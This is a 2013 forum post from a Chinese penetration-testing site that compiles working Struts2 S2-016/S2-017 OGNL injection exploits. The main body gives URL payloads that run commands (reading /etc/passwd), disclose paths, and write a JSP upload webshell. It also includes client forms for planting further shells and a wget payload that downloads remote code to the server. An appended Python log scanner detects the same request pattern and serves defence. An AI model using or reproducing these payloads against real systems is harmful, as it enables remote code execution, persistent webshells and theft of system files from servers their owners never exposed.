中国网络渗透测试联盟

Title: Struts2 S2-016/S2-017 vulnerability code execution

Author: admin    Time: 2013-7-18 23:03
Everyone has posted these already; I just tidied them up. Friendly reminder: your own life matters more than a shell.

If you like it, click thanks ^_^

Command execution with echoed output:

http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

Path disclosure:

http://www.example.com/struts2-b ... 8%29.close%28%29%7D

Write file:

http://www.example.com/struts2-blank/example/X.action?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e

Contents of the written file:

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

It is really just a small JSP shell and needs a client to go with it.

f is the file name, t is the content.

Client:

<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea>
<center>
<input type=submit value="提交">
</form>

This creates fjp.jsp in the current directory.

shell: http://www.example.com/struts2-blank/example/fjp.jsp

There is also a client from @园长:

<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>jsp-园长</title>
</head>
<style>
.main{width:980px;height:600px;margin:0 auto;}
.url{width:300px;}
.fn{width:60px;}
.content{width:80%;height:60%;}
</style>
<script>
  function upload(){
    var url = document.getElementById('url').value,
      content = document.getElementById('content').value,
      fileName = document.getElementById('fn').value,
      form = document.getElementById('fm');
    if(url.length == 0){
      alert("Url not allowed empty!");
      return ;
    }
    if(content.length == 0){
      alert("Content not allowed empty!");
      return ;
    }
    if(fileName.length == 0){
      alert("FileName not allowed empty!");
      return ;
    }
    form.action = url;
    form.submit();
  }
</script>
<body>
<div class="main">
  <form id="fm" method="post">
    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />
    <a href="javascript:upload();">Upload</a>
    <textarea id="content" class="content" name="t" ></textarea>
  </form>
</div>
</body>
</html>

And a wget getshell posted by @X:

?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
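As an added example (not from the original post), a Python detector for the request shape all of the S2-016 payloads above share: a query parameter whose name begins with redirect: or redirectAction: and whose value is an OGNL ${...} or %{...} expression. It URL-decodes the query string (including double encoding) and reports which of the payload markers it sees. The log lines, client addresses and the marker list are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines; requests 1, 2 and 4 mirror the payloads in the post, 3 is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jul/2013:23:03:01 +0800] "GET /struts2-blank/example/X.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream()} HTTP/1.1" 200 1532
10.0.0.6 - - [18/Jul/2013:23:04:10 +0800] "GET /struts2-blank/example/X.action?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22)} HTTP/1.1" 200 0
10.0.0.7 - - [18/Jul/2013:23:05:00 +0800] "GET /struts2-blank/example/HelloWorld.action?name=alice HTTP/1.1" 200 812
10.0.0.8 - - [18/Jul/2013:23:06:00 +0800] "GET /struts2-blank/example/X.action?redirectAction:%25%7B%2523context.get(%27xwork%27)%7D HTTP/1.1" 302 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# S2-016: a parameter name starting with redirect: or redirectAction: whose value
# is an OGNL expression (${...} or %{...}) is evaluated by the framework.
PREFIX_RE = re.compile(r'(?:^|[?&])(redirect|redirectAction):([$%]\{)', re.IGNORECASE)
# Strings the payloads above contain once percent-encoding is removed (constructed list).
MARKERS = ("#context", "ProcessBuilder", "getRealPath", "xwork2.dispatcher", "FileWriter")

def decode_fully(s, max_rounds=3):
    """Undo repeated percent-encoding; double-encoded variants dodge naive filters."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def inspect_request(target):
    """Return a list of findings for one request target (path plus query string)."""
    findings = []
    if "?" not in target:
        return findings
    query = decode_fully(target.split("?", 1)[1])
    m = PREFIX_RE.search(query)
    if m:
        findings.append("S2-016 OGNL via %s: prefix" % m.group(1))
    findings.extend("payload marker " + mk for mk in MARKERS if mk in query)
    return findings

def scan_log(text):
    """Scan access-log text; return (client_ip, findings) for each flagged line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            findings = inspect_request(m.group("target"))
            if findings:
                hits.append((line.split()[0], findings))
    return hits
```

The prefix check is the durable signal: the marker list only catches payloads that resemble the ones in this thread, so treat it as context for triage rather than as the detection itself.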




Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2